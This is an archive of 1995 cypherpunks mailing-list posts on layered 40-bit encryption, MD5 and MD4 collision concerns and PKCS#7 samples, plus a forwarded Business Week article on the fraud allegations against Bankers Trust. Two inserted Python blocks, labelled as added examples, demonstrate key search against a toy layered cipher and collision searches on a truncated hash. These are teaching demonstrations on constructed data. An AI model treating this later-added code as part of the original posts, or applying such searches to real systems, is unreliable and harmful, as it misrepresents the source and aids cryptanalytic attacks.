Subject: 80 bits from 40 bits -- NOT
Message-ID: <9509248145.AA814570684@snail.rsa.com>
MIME-Version: 1.0
Content-Type: text/plain


        Well, let me eat my words.  Unless all layers turn on
encryption at the same time, and there is not predictable text
that passes from one layer to the next, adding encryption at
each layer cannot substantially improve the size of the key
space.  Consider two layers each of which has a verifiable
header and a body of encrypted text.  By "verifyable", I mean
that it contains enough redundancy to recognize a correct
decryption of the cipher added by the lower layer.  For example,
a header that included a content type field and a length field
could be examined to see if it looked reasonable, and thus
confirm a guess at the lower level's cipher.


                Plaintext-Body-1
                      |
                 Layer-1-cipher
                      |
      Header-1, Encrypted-Body-1
               |
            Layer-2-cipher
                   |
   Header-2, Encrypted-Body-2

        To crack this system, an attacker does brute force search
of the keyspace for the layer-2-cipher, for each key check the
decrypted Header-1 value to see if it looks OK, if not, continue,
otherwise start searching the keyspace for the Layer-1-cipher
given the candidate for the Encrypted-Body-1 produced by the
guess at the Layer-2-cipher key.  Clearly, if you have several
layer 2 blocks and they all have good looking values for the
Header-1, then the Layer-2-cipher key is correct.

        The summary is that two layers of 40 bit ciphers with
the first layer adding some verifiable information, has the effect
of adding at most one bit to the effective keysize (doubling the
amount of work).  It DOES NOT increase the keysize to 80 bits.
                --Bob Baldwin


______________________________ Reply Separator _________________________________
Subject: 80 bit security from 40 bit exportable products
Author:  "baldwin" <baldwin@RSA.COM (Robert W. Baldwin)> at INTERNET
Date:    10/24/95 10:52 AM

        Long ago vendors should have put encryption into network layer
products, but for a variety of reasons that effort was delayed or 
discouraged.  One effect of this lack is that almost every layer of 
the network stack is adding its own encryption.  For example, the 
HTTP session layer added S-HTTP and the TCP transport layer added 
SSL.  Soon we will have network layer encryption with IPsec.
        The vendors for each layer can export a product that uses
ciphers with 40 bit keys.  A user can then combine multiple 
products to get more than 40 bits worth of security.  For example, 
a web client might fetch an S-HTTP page over an SSL protected link 
via a firewall that supports IPsec tunnels.  That's three 40 bit 
keys protecting the data over the internet link (of course, this 
may not be equivalent to a 120 bit cipher, that depends on the 
details of the cipher systems and independence of the key setups). 
Interesting possibilities.
                --Bob Baldwin
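
The layer-by-layer search from the message above, run against a toy two-layer stack, as an added example that is not part of the original post. `toy_cipher`, the 12-bit keys standing in for 40-bit ones, the header formats and the sample body are all constructed assumptions; what it measures is the trial count, which grows as the sum of the two keyspaces rather than their product.

```python
import hashlib
import re

KEY_BITS = 12                 # stand-in for 40 bits so the search finishes quickly
KEYSPACE = 1 << KEY_BITS
HEADER2 = b"HDR2\n"           # constructed cleartext outer header
HEADER1_RE = re.compile(rb"TYPE=[a-z]+ LEN=(\d{4})\n")
SAMPLE_BODY = b"constructed sample plaintext: order 42 widgets, ship Tuesday"


def toy_cipher(key: int, data: bytes, layer: bytes) -> bytes:
    """XOR with a SHA-256 counter keystream; the same call encrypts and decrypts."""
    out = bytearray()
    for offset in range(0, len(data), 32):
        seed = layer + key.to_bytes(2, "big") + offset.to_bytes(4, "big")
        keystream = hashlib.sha256(seed).digest()
        out.extend(b ^ k for b, k in zip(data[offset:offset + 32], keystream))
    return bytes(out)


def wrap(body: bytes, key1: int, key2: int) -> bytes:
    """Layer 1 encrypts the body and adds Header-1; layer 2 encrypts both."""
    enc1 = toy_cipher(key1, body, b"L1")
    header1 = b"TYPE=text LEN=%04d\n" % len(enc1)
    return HEADER2 + toy_cipher(key2, header1 + enc1, b"L2")


def check_header1(candidate: bytes):
    """Return Encrypted-Body-1 if the decrypted Header-1 looks reasonable, else None."""
    m = HEADER1_RE.match(candidate)
    if m is None or int(m.group(1)) != len(candidate) - m.end():
        return None
    return candidate[m.end():]


def looks_like_text(body: bytes) -> bool:
    """Assumed recognizer for the innermost plaintext: printable ASCII only."""
    return len(body) > 0 and all(32 <= b < 127 for b in body)


def layered_search(packet: bytes):
    """Search layer 2 first, using Header-1 to confirm each guess, then layer 1."""
    outer = packet[len(HEADER2):]
    trials = 0
    for k2 in range(KEYSPACE):
        trials += 1
        enc1 = check_header1(toy_cipher(k2, outer, b"L2"))
        if enc1 is None:
            continue              # Header-1 is garbage: wrong layer-2 key
        for k1 in range(KEYSPACE):
            trials += 1
            body = toy_cipher(k1, enc1, b"L1")
            if looks_like_text(body):
                return k1, k2, body, trials
    return None


if __name__ == "__main__":
    k1, k2, body, trials = layered_search(wrap(SAMPLE_BODY, 0x5A3, 0xC07))
    print("keys:", hex(k1), hex(k2), "trials:", trials)
    print("sum of keyspaces:", 2 * KEYSPACE, "product:", KEYSPACE ** 2)
```

Removing the redundancy from Header-1, so that a layer-2 guess cannot be confirmed on its own, is the condition under which the layers would have to be searched jointly.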






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Tue, 24 Oct 95 12:02:35 PDT
To: hallam@w3.org
Subject: Hash collisions [was Re: MD5 weakness ? ...]
In-Reply-To: <9510241714.AA22217@zorch.w3.org>
Message-ID: <199510241903.TAA18608@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain



>
>>As to weaknesses, I seem to remember that someone managed to forge a
>>modification to a program used to observe networks on a Sun so that it
>>had the same MD5 checksum as the official trusted version.  But whether
>>this is real is not strictly the issue. 
>
>Ron has not mentioned such an event to me and if that were the case I would 
>seriously doubt that he would not have been told about it. The only comment he
>generally makes is that he wrote MD5 because "MD4 was making me nervous".
>
>>In the case of the trust being placed in MD5 by Netscape, the assumption
>>being made (without adequate support as far as I can tell) is that an
>>MD5 checksum cannot be forced, through a chosen plaintext attack, to
>
>Netscape do not simply use the MD5 of the message, they are using (as I 
>understand it) the PKCS#1 standard for making the signature. If not they 
>probably have severe problems.
>
>>There has been no limit given by anyone on this list to the level of
>>trust they place in MD5.  Several people have posted (without
>>contention) that MD5 is sufficiently trustworthy to trust billions of
>>dollars in commerce to its being able to prevent a selected plaintext
>>attack as alluded to above. 
>
>NIST and the NSA trusted MD4 sufficiently to base SHA upon it. SHA is preferable
>in many ways to MD5, it has a different approach to extending the scheduling and
>resist differential cryptanalysis. There is a problem with the compressor 
>function of MD5 which I dislike. This is fairly irrelevant though since SSL 
>allows other digests to be used.
>
>	Phill

I hesitate to jump in to this exchange given the defensive and
vague nature of the discussion, but...

While I agree that SHA seems preferable, for a number of reasons,
to MD5, it is worth noting that Hans Dobbertin of the German Information
Security Agency recently found a collision in MD4. His attack
allows you to generate a pair of plaintexts that generate the same hash.
A fast technique for finding a second plaintext that hashes to some given
value remains an open problem with MD4 (and SHA and MD5, for that matter).

As far as I can tell the attack does not readily generalize to MD5
or SHA.

-matt
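
The two problems separated in the message above (finding any colliding pair versus finding a second plaintext for a given hash), measured on a digest truncated until generic search is feasible. This is an added example, not part of the original post and not Dobbertin's attack; truncated SHA-256 (`short_hash`) stands in for the real digest, and all messages are constructed.

```python
import hashlib
from itertools import count


def short_hash(msg: bytes, bits: int) -> int:
    """Top `bits` bits of SHA-256, used as a deliberately undersized digest."""
    return int.from_bytes(hashlib.sha256(msg).digest(), "big") >> (256 - bits)


def find_collision(bits: int):
    """Birthday search: any two distinct messages with the same short hash.

    The searcher chooses both messages, so about 2**(bits/2) trials suffice.
    Returns (msg_a, msg_b, trials).
    """
    seen = {}
    for i in count():
        msg = b"doc-%d" % i
        h = short_hash(msg, bits)
        if h in seen:
            return seen[h], msg, i + 1
        seen[h] = msg


def find_second_preimage(target_msg: bytes, bits: int):
    """Generic search for a different message matching one fixed hash.

    The target is not the searcher's choice, so about 2**bits trials are needed.
    Returns (msg, trials).
    """
    target = short_hash(target_msg, bits)
    for i in count():
        msg = b"forgery-%d" % i
        if msg != target_msg and short_hash(msg, bits) == target:
            return msg, i + 1


def compare(bits: int, target_msg: bytes = b"official release (constructed)"):
    """Run both searches at the same digest size and report the work done."""
    a, b, collision_trials = find_collision(bits)
    forged, preimage_trials = find_second_preimage(target_msg, bits)
    return {
        "bits": bits,
        "collision": (a, b),
        "collision_trials": collision_trials,
        "second_preimage": forged,
        "second_preimage_trials": preimage_trials,
    }


if __name__ == "__main__":
    for bits in (12, 16, 20):
        r = compare(bits)
        print(bits, "bits: collision after", r["collision_trials"],
              "trials; second preimage after", r["second_preimage_trials"])
```

A collision result therefore threatens uses where one party can choose both inputs, while substituting a different file for an already published one is the second-preimage problem.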




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Bryan <sbryan@maroon.tc.umn.edu> (Steve Bryan)
Date: Tue, 24 Oct 95 13:05:51 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: MD5 weakness ? [was Re: Netscape Logic Bomb detailed by IETF]
Message-ID: <v02130502acb2c07e0758@[204.221.10.130]>
MIME-Version: 1.0
Content-Type: text/plain


Dr. Frederick B. Cohen writes:

>In the case of the trust being placed in MD5 by Netscape, the assumption
>being made (without adequate support as far as I can tell) is that an
>MD5 checksum cannot be forced, through a chosen plaintext attack, to
>yield checksums of 1, 2, 3, 5, 7, 9, ...  on up to enough primes to
>allow the known plaintext attack that gets the RSA private key used to
>authenticate messages.  As far as I am aware (and I may not be aware of
>everything) there is no reference work to support this assumption.  If
>the assumption is wrong, then the whole SSL can fall to a selected
>plaintext attack launchable (presumably) through those general purpose
>Java applets we have heard so much about.

With a mailing list this large and diverse one can reasonably assume a range of interests and expertise. What I don't understand is your agnostic stance on something as apparently basic as MD5. If computer security is your purported area of expertise why have you not reached any firm conclusions about it? I understand that rigid conclusions are unsafe (eg they'll never prove Fermat's last theorem) but it is not like every question is equally open. Do you have a realistic attack on MD5 or is this sophomoric claptrap? How do you propose to generate messages with specific message digests? Assuming you could somehow, how do you proceed to use that information to your advantage? So let's say I have a message digest and I'm retrieving the allegedly corresponding message which you have the opportunity to alter to your heart's content. How would you proceed, even in principle, to defeat MD5? I realize I might be assuming too much when I posit that I have the true MD5 for the message but my understanding is that you feel that MD5 might be vulnerable. I've given you all the known plaintexts. Is there a next step?

+----------------------------------------------------------------------
|Steve Bryan                Internet: sbryan@gofast.net
|Sexton Software          CompuServe: 76545,527
|Minneapolis, MN                 Fax: (612) 929-1799
|PGP key fingerprint: B4 C6 E2 A6 5F 87 57 7D  E1 8C A6 9B A9 BE 96 CB
+----------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frenchie@magus.dgsys.com (SysAdmin)
Date: Tue, 24 Oct 95 12:14:21 PDT
To: sameer@c2.org (sameer)
Subject: Re: C|Net
In-Reply-To: <199510241637.JAA02576@infinity.c2.org>
Message-ID: <m0t7okY-000xhpC@magus>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

While browsing my mail I noticed that sameer wrote:
 
> 	Eesh folks. Someone registered cypherpunks/cypherpunks as a
> username/password combination as c|net and that was the
> verification. relax.
> 
> > 
> > ----------------crap deleted---------------

Well to stray off topic,as seems to be the case lately,
I saw Sameer's interview on C-Net a coupla weeks back. Nice to be able to 
place a name with a face. Too bad they didn't give you a chance to say more
for the cause.

Now.....back to crypto....

- -- 
=====================PGP Encrypted Mail Preferred========================
       PGP Public Keys: 1024/BEB3ED71 & 2047/D9E1F2E9 on request. 
           As soon as any man says of the affairs of the state 
    " What does it matter to me? " the state may be given up for lost.
                    J.J.Rousseau - The Social Contract
GAT/E/O d++@>- H--- s: a29 C+++$ UL++++($) P+>+++ L++>++++ E W+++ N++ K- 
w---- O- M- V-- PS+ PE++ Y+ PGP+++ t 5+ X R* tv b++ DI++ D++ G++ e h+ r 
y++ [Geek Code v3.0] a.k.a [ root@magus.dgsys.com / vamagus@delphi.com]
==========================================================================

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: There was a bluestocking in Florence
Wrote anti-sex pamphlets in torrents,
	Till a Spanish grandee,
	Got her off with his knee,
7 d she 

iQCVAgUBMI06E7bmxeO+s+1xAQEBDQQAoGlMjWcSzHNuU1SchnPby5qstT2HruNK
K49EFM/soIO9LAvoYDa6Q2dZBd/kyRk3bj5WEK4hN9qihifnwuk83sCF3gJK67oW
CcTO+Z2dp3yWKVgX0Ki8K1iFdEbCfV2n1CujD+8bF914oZF4ZRLAbGLRtozqIzo4
65zJjHe2M58=
=8tvy
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Young <eay@mincom.oz.au>
Date: Mon, 23 Oct 95 22:21:01 PDT
To: cypherpunks@toad.com
Subject: pkcs7 examples
Message-ID: <Pine.SOL.3.91.951024150442.12625C-100000@orb>
MIME-Version: 1.0
Content-Type: text/plain



Greetings peoples,

I have just about finished writing routines to parse and write pkcs7 objects.
I have written all the backend digital envelope routines and so now I 
have to decide on the library API and test things.

I currently only have a single pkcs7-signedData example, one that is being 
used to 'transport' x509 certificates and CRL's.

Do any of you out there have pkcs-7 'objects' you can send me?
I especially want examples of pkcs7 signedAndEnveloped.

For those that don't know, pkcs7 is used in S/MIME and is a superset of 
PEM.  The degenerative case of signedData is being used by protocols 
such as SSLv3 to transport X509 CRL's.

thanks in advance.

eric (whose SSL library is becoming a kitchen sink of crypto related stuff)
--
Eric Young                  | Signature removed since it was generating
AARNet: eay@mincom.oz.au    | more followups than the message contents :-)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Tue, 24 Oct 95 07:29:09 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: MD5 weakness ? [was Re: Netscape Logic Bomb detailed by IETF]
In-Reply-To: <LAA19345.199510231500@garotte.va.pubnix.com>
Message-ID: <9510241425.AA08815@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain


DOCTOR Frederick B. Cohen writes:
 > [...] uses an MD5 checksum which the members
 > of this list seem to place unlimited trust in (incorrectly in my view,
 > but that would be picking two nits with one keyboard entry).

Can you elaborate with facts on the supposed weakness of MD5 ?

[btw who talked about 'unlimited' trust ?]

dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

AK-47 PGP domestic disruption CIA cracking strategic Clinton




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Tue, 24 Oct 95 07:30:35 PDT
To: cypherpunks@toad.com
Subject: Bankers Trust Frand Story
Message-ID: <199510241429.PAA09756@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



Bankers Trust is one of the companies that are pushing
strongly for CKE and want to be one of the keyholders.
They have hired Stu Baker (Fmr NSA General Counsel), 
Nanette DiTosto from the International Chamber of Commerce 
and Ernie Brickell from Sandia Labs.

The tapes reveal a variety of fraudulent behavior by 
BT's employees who brag about fucking their clients. 

Who wants to give their keys to them?

-------------
Business Week: October 16, 1995
Department: Cover Story
THE BANKERS TRUST TAPES
In just-released court papers, Procter & Gamble lays out racketeering charges against Bankers Trust. The key evidence: Some 6,500 tape recordings

It's Nov. 2, 1993, and two employees of Bankers Trust Co. are discussing a leveraged derivative deal the bank had recently sold to Procter & Gamble Co. ``They would never know. They would never be able to know how much money was taken out of that,'' says one employee, referring to the huge profits the bank stood to make on the transaction. ``Never, no way, no way,'' replies her colleague. ``That's the beauty of Bankers Trust.'' 
   That dialogue was automatically picked up by a Bankers Trust recording system--similar to those at other financial institutions--that routinely tapes conversations involving transactions, mainly to settle disputes over trades. It is part of a mountain of evidence--6,500 tapes, as well as 300,000 pages of written material--that forms the basis of a major legal assault by P&G against the bank. P&G contends that the 1993 conversation is just one of many showing that Bankers Trust deliberately misled and deceived P&G, keeping the company in the dark about key aspects of the derivatives the bank was selling.
   Once one of the most powerful, profitable, and aggressive banks in the world, Bankers Trust has been humbled over the past 18 months by a series of debacles in its core derivatives business, with numerous clients of the bank sustaining large losses. P&G took a $102 million aftertax charge for losses on Bankers' derivatives, perhaps the largest of any of its customers. Several other clients have also sued the bank for losses. And the Securities & Exchange Commission, the Commodity Futures Trading Commission, and the Federal Reserve Bank of New York have all investigated Bankers' derivatives sales practices and reprimanded or censured the bank.
   Procter & Gamble's fight with Bankers Trust is now taking a new and far more ominous turn for the bank. On Sept. 1, P&G filed a motion with the U.S. District Court in the Western Division of the Southern District of Ohio to add RICO (racketeer-influenced and corrupt organization) charges to its list of allegations against the New York bank and its affiliate, BT Securities Corp. Supporting documents, which contain numerous excerpts of conversations by the bank's employees, were sealed until Oct. 3. On the same day, district court judge John Feikens approved the P&G RICO motion.
   Some portions of the tapes, mainly concerning Gibson Greetings, a Bankers Trust client, became public last year. But the newly released portions, some of which are potentially incriminating, are much more extensive. They focus on eight Bankers customers besides P&G. The alleged losses of three of them--Sandoz, Sequa, and Jefferson Smurfit--had not been previously detailed. Other alleged victims in the amended complaint are Gibson Greetings, Equity Group Holdings, Adimitra Rayapratama, Air Products & Chemicals, and Federal Paper Board (table, page 111).
``BLACKMAIL.'' P&G uses evidence of alleged wrongdoing against these clients to buttress the racketeering charges, which require a showing of broad, systemic fraud. Asserts the P&G filing: ``It is now apparent that Defendants' treatment of P&G was not an isolated incident or a `garden-variety fraud,' but rather part of a pattern of mail, wire, and securities fraud spanning a number of years and involving multiple victims.'' 
   In a 400-page filing opposing P&G's claims, Bankers says that ``P&G plainly has proposed adding civil RICO claims at this late date for their in terrorem effect; laymen would call it blackmail.'' The bank says further that ``The real impetus for these charges is P&G's hope that legitimate criticism of decisions by P&G's senior management and Treasury Dept. staff will be lost at trial in a sea of accusations about customers other than P&G, and that Bankers Trust can be vilified by the sheer number of P&G's accusations.'' In a statement released after P&G's documents were unsealed, Bankers said that ``What P&G has done is to use material we provided to manufacture a distorted view of transactions, markets, individuals, and the corporation in a manner designed to serve its own objectives and to obscure P&G's own accountability.'' BW attempted to solicit comments from Bankers Trust's directors, but they either refused, referred calls to the bank, or could not be reached.
   P&G provides a detailed case for its side. To substantiate its claim that a ``culture of greed and duplicity'' was an element of the general climate in parts of Bankers' derivatives business, P&G cites a videotaped training session for new employees. At the session, a bank employee tells his charges that, in a hypothetical derivative transaction among Sony, IBM, and Bankers Trust, ``what Bankers Trust can do for Sony and IBM is get in the middle and rip them off--take a little money.'' The employee then adds: ``Let me take that back. I just realized that I'm being filmed.'' A Bankers spokesman played six minutes of the videotape of the session for BW, which the bank says lends support to the bank's contention that the employee's comment was ``a very poor attempt at humor, but nothing more,'' in an ``otherwise dull presentation'' and that the comment was taken out of context.
   According to P&G: ``Fraud was so pervasive and institutionalized that Bankers Trust employees used the acronym `ROF'--short for rip-off factor, to describe one method of fleecing clients.'' An internal document about a proposed derivative for Federal Paper Board allegedly says that Bankers would make $1.6 million on the deal, including a ``7 [basis point] rip-off factor.'' In a different instance, two Bankers employees are discussing a client's loss on a trade. One then tells the other: ``Pad the number a little bit.'' P&G quotes another Bankers Trust employee saying to a colleague: ``Funny business, you know? Lure people into that calm and then just totally f--- 'em.'' 
   In responding to conversations by Bankers Trust employees quoted in this story, a bank spokesman says that ``the stupid and crude comments between Bankers Trust employees on these tapes were the basis for our disciplinary actions against these individuals last year.'' A number of the employees quoted in the documents have left Bankers, been disciplined, or been reassigned.
UPPING THE ANTE. John E. Pepper, P&G's new CEO, will not comment on the Bankers situation. But the racketeering charge shows he is maintaining the company's well-known aggressive legal posture. A P&G spokeswoman says: ``We've reviewed hundreds of recorded telephone conversations and thousands of documents through discovery and believe the RICO claim was appropriate. We plan to proceed with the case.'' The company further claims that it expects to uncover additional evidence.
    In its filings, P&G details three primary schemes Bankers allegedly used to defraud its clients. It says the bank fraudulently induced clients to buy complex derivatives, misrepresented the contracts' value, and then induced clients to buy additional complex derivatives, either for further ``alleged gains'' or to stanch losses. It quotes one banker describing a client's portfolio as being in total disarray: ``If this ever comes out in the press, it is the most insane mess of trading I've ever, ever seen...they just kept trying to trade them out of losses...Everything they put in [the client's account] lost.'' 

_________________________________________________________________

`` P&G has...manufacture[d] a distorted view of transactions, markets, individuals, and the corporation . . . to serve its own objectives and to obscure P&G's own accountability ''
 --     BANKERS TRUST PRESS RELEASE
_________________________________________________________________

   The new charges, which claim $195.5 million in damages, could prove extremely embarrassing to the bank--or worse. Any company found guilty of civil RICO charges must pay treble damages and plaintiffs' legal costs. Such an outcome could push Bankers to settle the suit regardless of its culpability. ``It ups the ante,'' says attorney Robert Plotkin of Paul, Hastings, Janofsky & Walker in Washington. In addition, clients could become unsettled by the appearance of a corrupt culture, and senior management could come under even more pressure.
   Much of the dispute between Bankers Trust and its clients that suffered losses may depend on whether the clients were simply naive and should have known what they were getting into or whether Bankers Trust deliberately deceived them. P&G strongly argues the latter.
   On Jan. 20, 1993, P&G had no inkling that its relationship with Bankers would ever deteriorate so badly. That's when it set up a broad agreement with the bank for derivatives contracts. One goal was to lower the rate at which P&G would borrow money. Derivatives are contracts in which companies make payments to each other tied to some underlying asset. The value of the payments--and thus the contract--is derived from those assets. Besides lowering financing costs, buyers may use derivatives to manage risk or speculate on interest and currency rates.
   P&G seemed to be an active and sophisticated player in the financial markets: It had $5 billion in long-term debt outstanding, and it carefully managed its financing costs. In court filings, Bankers describes P&G as ``sophisticated, experienced, and knowledgeable about the use of interest-rate derivative contracts and the risks presented by those contracts.'' The bank adds: ``Although P&G would like this court to believe that it is a naive and unsophisticated user of derivatives transactions, the fact is that as part of its regular course of business and with authorization from top management...P&G's Treasury Department managed a large and sophisticated portfolio of derivative transactions.'' P&G, the bank says, was a party to derivatives tied to assets with a value of more than $6 billion as of June, 1993.
   In its memorandum opposing P&G's motion, Bankers presents documents, including handwritten notes apparently by Edwin Artzt, P&G's chief executive officer at the time, that suggest the Cincinnati company was knowingly stepping up the riskiness of its financing activities when it entered into the disputed transactions with Bankers. P&G says the note does not apply to debt management or to the transactions in the litigation.
   On Nov. 2, 1993, P&G agreed to an offer from Bankers Trust to buy a leveraged derivative product. Leveraged derivatives are a particularly complex type of derivative, and their value can fluctuate to an even greater degree than ordinary, plain-vanilla derivatives. The contract called for P&G to make variable-rate payments to Bankers, with the rate to be set over the next several months.
   It is not clear whether P&G knew what the cost of getting out of the contract might be, and P&G has since acknowledged that its internal procedures were not followed when it agreed to this derivative. The company also ultimately reassigned two employees involved with the derivatives, and its treasurer, Raymond D. Mains, who later elected to retire early. Mains declined to comment. But at the time, the company believed it might get interest costs below what they would have been otherwise.
   The derivative seemed to work fine at first. Indeed, P&G was sufficiently satisfied to agree to a second leveraged derivative contract on Feb. 14, 1994. But P&G began encountering serious problems almost immediately. On Feb. 4, interest rates had begun rising after more than three years of near-continuous decline. The higher rates sharply pushed up P&G's payments to Bankers under the terms of the complex derivatives.
``IRRESPONSIBLE AND REGRETTABLE.'' On Feb. 22, P&G claims, Bankers told the company that at that day's rate, P&G stood to pay Bankers an increased interest rate of 4.5 percentage points above the commercial-paper rate on its Nov. 2 derivative, bringing its extra financing costs to over $40 million. P&G says its officials were alarmed by the unexpectedly large amount. They charge that when they asked Bankers for an explanation, they learned that the bank was using a proprietary model to figure the costs. Bankers, P&G's complaint says, ``stated that P&G was bound by a pricing model which [Bankers] did not disclose to the very party that it asserted was bound by such model.''

_________________________________________________________________

`` What Bankers Trust can do for Sony and IBM is get in the middle and rip them off--take a little money....Let me take that back, I just realized I'm being filmed ''
 --     P&G COURT FILING THAT ALLEGEDLY REFLECTS WHAT WAS SAID AT A BANKERS TRUST VIDEOTAPED TRAINING SESSION

_________________________________________________________________

   Bankers Trust's court filings include a transcript of an October, 1993, conversation between Bankers and P&G in which Bankers apparently shows a P&G treasury employee how to calculate its rate on the Nov. 2 derivative. Bankers says this transcript demonstrates that P&G clearly knew how its derivative would perform. The bank also cites file memos from three P&G employees that it says indicate that P&G was made aware of the rising rates on its Nov. 2 derivative in early or mid-February, 1994. As for the Feb. 14 derivative, Bankers presents as evidence notes by P&G's chief financial officer, Erik Nelson, that it says show that he did not feel P&G was misled on that derivative's terms.
   P&G, however, claims that those notes were written before the company learned all it now knows about that derivative. And it says Bankers employees were clearly and almost continuously trying to deceive it from the day the derivative contract was initiated. P&G cites a taped conversation between Bankers employees about the Nov. 2 P&G contract where one asks: ``Do they [P&G] understand that? What they did?'' The other replies: ``No. They understand what they did but they don't understand the leverage, no.'' The first employee then responds: ``But I mean...how much do you tell them. What is your obligation to them?'' The second employee answers: ``To tell them if it goes wrong, what does it mean in a payout formula...'' 
   Bankers employees were often gleeful at the big profits they were booking, according to P&G. The second employee quoted above says P&G undertook an option trade as part of a derivatives contract, and Bankers paid P&G only half what that option was worth. The employee allegedly remarks: ``This could be a massive huge future gravy train.'' He also allegedly discussed how significant one of P&G's contracts had been for Bankers, saying, ``This is a wet dream.'' 
In April, P&G claims, Bankers Trust gave the company charts showing that it would have had to pay a penalty to get out of its Nov. 2 contract almost from Day One. According to P&G's documents, one Bankers salesman, discussing P&G's agreement to enter into the Nov. 2 contract, said ``we set 'em up.'' P&G claims that, unbeknownst to the company at the time, there were periods when Bankers' model calculated that P&G's potential penalty payment to exit the derivative was rising even when interest rates were falling.
   P&G claims that around that time, some Bankers employees were themselves worrying about the suitability of their activities. It cites a March, 1994, conversation between two employees where one said he had ``fears of SEC probes.'' ``This wave was always...made up of polluted water,'' one says. The other recalls telling a colleague that ``as soon as we quit selling dynamite, maybe we'll have a good business.''
   P&G ultimately locked in interest rates on both of the leveraged derivatives in dispute. But it alleges that by the time it finished doing so, in April, 1994, its financing costs stood to be some $195.5 million higher than they should have been. That same month, P&G said: ``We are seriously considering our legal options relative to Bankers Trust.'' 
   In a statement, Bankers concedes that some of the taped conversations ``were irresponsible and regrettable.'' But it says the remarks fall short of proving the deception P&G alleges. Instead, it produces evidence in court filings that P&G's top executives blamed their own personnel for the investment blunders. ``Rather than putting its own house in order, and accepting its losses, P&G chose instead to bring this lawsuit.''

_________________________________________________________________

`` Fraud was so pervasive...that Bankers Trust employees used the acronym ROF--short for rip-off factor, to describe one method of fleecing clients ''
 -- P&G COURT FILING

_________________________________________________________________

   P&G is also making serious fraud claims about Bankers' dealing with other clients. Several of the alleged victims have already gone public with their derivatives grievances. Gibson Greetings has settled a lawsuit with Bankers, as has Equity Group Holdings. Adimitra Rayapratama also sued, claiming RICO violations, although a ruling dismissing its suit on jurisdictional grounds is under appeal. And Federal Paper Board has settled with Bankers. Bankers Trust says in court filings that it needs much more information before it can refute P&G's allegations about other companies.
   The P&G filing provides new information about three Bankers Trust clients whose relationship with the bank has not been previously detailed. In the case of Sandoz Corp., P&G claims that Sandoz entered into a leveraged derivative contract with Bankers on Jan. 31, 1994. Beginning in February, P&G says, employees of BT Securities knowingly misled Sandoz about the value of its contract by $5 million. Sandoz allegedly amended its derivative contract nine times on Bankers' recommendation, spending some $25 million in the process. At one point, P&G asserts that Sandoz paid $4.2 million to modify its derivative contract when the change increased its value by only $2.9 million. That netted Bankers over $1.4 million.
SETTLEMENT? P&G also claims that a BT Securities representative, knowing that such a move would generate a large profit for Bankers, told Sandoz that the ``conservative'' way to manage its position would be to double its exposure while increasing the interest rate above which it would be hit with higher payments under the contract. But on Feb. 22, discovering that Bankers did not have the proper hedge to cover such a change, the Bankers rep reversed course--and began encouraging Sandoz to reduce its position. P&G alleges that Sandoz lost $78.5 million in dealings with Bankers. Sandoz General Counsel Robert L. Thompson says: ``We have settled a matter with Bankers Trust. The terms of the settlement are confidential,'' and he adds that Sandoz continues to have a ``productive'' relationship with Bankers.
   As for Sequa Corp., P&G alleges that Bankers sold it a leveraged derivative--similar to P&G's Nov. 2 contract--on Oct. 1, 1993. In December, Bankers allegedly proposed various amendments to the contract that it told Sequa were costless. But, says P&G, an internal Bankers Trust phone call described it as having a negative value for Sequa of $600,000 and a profit for Bankers Trust of $200,000.
   With interest rates rising, P&G says Sequa terminated half of the contract in February, 1994, at a cost of $2.5 million. Sequa allegedly terminated the rest a month later at a cost of $4.5 million, financing that with another transaction in which it was to pay Bankers $6 million over the ensuing two years. Total alleged loss: $7.5 million. Sequa declined comment.
   In the case of Jefferson Smurfit Corp., P&G alleges that Smurfit entered into a leveraged derivative contract in May, 1993. The derivative quickly began losing value, P&G says, and Smurfit closed out the contract and was paid $1.17 million by Bankers. But that was at a time, P&G claims, when Bankers internally valued Smurfit's position in the contract at $4.4 million.
   Smurfit agreed to another leveraged-derivative contract in December, 1993, according to P&G. The company says Bankers ``induced Smurfit to amend this swap [a kind of derivative] 11 times before it was finally unwound in September, 1994.'' Meanwhile, the value of Smurfit's contract was declining. P&G says Bankers did not tell Smurfit, however. Alleges P&G: ``As early as February, 1994, BT Securities marketers discussed the fact that Smurfit was $5 [million] or $6 million down on the deal and that Smurfit's Treasurer `has no clue' about how far `underwater' his company was on the transaction.'' 
   At one point, P&G claims, Bankers Trust employees discussed showing Jefferson Smurfit some information regarding one of its derivatives, and one employee said: ``...what we show them is gonna be kind of baloney....'' Ultimately, P&G says, Smurfit lost more than $2.4 million on its derivatives dealings with Bankers. Smurfit says it is not aware of suffering any losses on derivatives with Bankers.
   What's next for Bankers Trust? It's possible that the bank will settle with P&G rather than endure the possible playing of hours of incriminating tapes in open court. The Securities & Exchange Commission, which investigated Bankers Trust's derivatives sales practices, forced a deeply embarrassing settlement on the firm. The SEC says it is continuing to investigate evidence of individual wrongdoing. One thing, though, is clear: The ``massive huge future gravy train'' has been permanently derailed.


The Tale Of The Tapes

Procter & Gamble, through discovery, obtained 6,500 tape recordings, as well as 300,000 pages of documents from Bankers Trust. The material concerned nine Bankers Trust clients who lost money dealing with the bank. From this evidence, P&G is alleging that Bankers Trust:
  -- Engaged in a pervasive pattern of fraud spanning a number of years and involving numerous victims
  -- Induced customers to purchase complex derivative deals that produced high profits for the bank and often big losses for many of its clients
  -- Misrepresented to clients the pricing, current value and risks of the products it sold
  -- Refused to share its secret pricing models and other proprietary devices 
